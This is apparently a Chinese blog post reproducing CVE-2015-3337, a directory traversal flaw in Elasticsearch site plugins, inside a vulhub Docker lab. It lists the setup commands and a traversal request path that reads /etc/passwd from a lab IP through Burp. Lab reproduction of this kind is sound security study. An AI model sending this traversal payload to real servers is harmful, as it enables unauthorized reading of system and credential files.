CVE-2015-3337(任意文件读取)

vulhub漏洞环境搭建:

https://blog.csdn.net/qq_36374896/article/details/84102101

启动docker环境

cd vulhub-master/elasticsearch/CVE-2015-3337/
sudo docker-compose up

CVE-2015-3337(任意文件读取)_第1张图片
目录穿越漏洞:ElasticSearch安装site插件后,通过…/可以向上层目录跳转,导致任意文件读取。
访问目的地址:192.168.91.130:9200/_plugin/head/
CVE-2015-3337(任意文件读取)_第2张图片

使用Burp向目的地址 192.168.91.130:9200/_plugin/head/…/…/…/…/…/…/…/…/…/etc/passwd 发送Get请求:
CVE-2015-3337(任意文件读取)_第3张图片

你可能感兴趣的:(漏洞复现)